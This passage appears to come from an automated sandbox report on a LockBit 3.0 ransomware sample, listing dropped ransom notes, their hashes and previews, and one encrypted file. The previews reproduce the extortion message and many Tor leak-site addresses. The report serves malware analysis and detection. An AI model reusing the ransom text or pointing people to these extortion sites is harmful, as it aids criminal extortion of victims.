browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977810889884967
                Encrypted:false
                SSDEEP:192:ov6TgODX5UjvVbCkN0hygaMSuVdeczb4D+DYuo:RcODJUjtCkUyfMNz8D+DY3
                MD5:8BA9F2079A4D5A2D3CAAB3726F17F3B7
                SHA1:D8201E5714C454A9E1D58C6137DCEF1A8F96A87D
                SHA-256:FB3BA58FC894664E0573A8D0422619239EB5C7C8760DF03006F09AE9D88B2550
                SHA-512:2326E96A0AFDC30B4D9A32161AD4236D2DA5674734674928C18084C4A01290EE4D028A14F3AA3063E7893E45DFEC3ADB70BC62FF7C5C9FD2DAB5D7C32AF9E15E
                Malicious:false
                Preview:A .7wa....',..[...4......q._...zb...h.../..R.......$Z..%..q.M....u0.:9.<.x.i....+.Kkh..v...M.y.w8?%j.a..Oy...]Ma...}.F..*E.......3.._>.........&Y.....d....0......r.T.@.*.....^E..g...l...|J...K.P8.U..H...Jirv.V..2s...O..l..\...r..~N..i?....i....\_....'o...=/........+'e.\..T..)...a%}H.GL;F.-.bV)........C-..~..0.c_B!..B.......y....D&9.......[Z.rz.0..1..<8y...3..<.O.l.......al..z..fM....u.t..y.Q$u.k...k.h99..l5@.U....%^.:...S....;....y.."..u...F..\.E.*.4.N~......RG......@.\.Y.s..=..;.?.1....E..............(.h...w..c.....a[.M ..7.9$..Z...O\xS~..:["_@.yc]."......ajL.........g.V......A.d../...a$.s..cG......."...di.~z.T"t...5%.s......KOG*..w.N....%y..J|...0b....'F.*.W...M:.f/...=.3.r....q./......6,...a.aVp..7.....A h..6|F1zx-...r..5../.?.w$_..d.....s.f.%X#.G..M.BtZ;.Z...@....2...,.d....Q....8.. ..*.'~."{S......1..&7..Hp/....4.F.dh...]..2p.d..>..P^nL...?......&.m:..8cc.......N.RY.R...k.4...z...2.=.c.h......u.t..D....N..$.?..@.....4....;.....7...

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
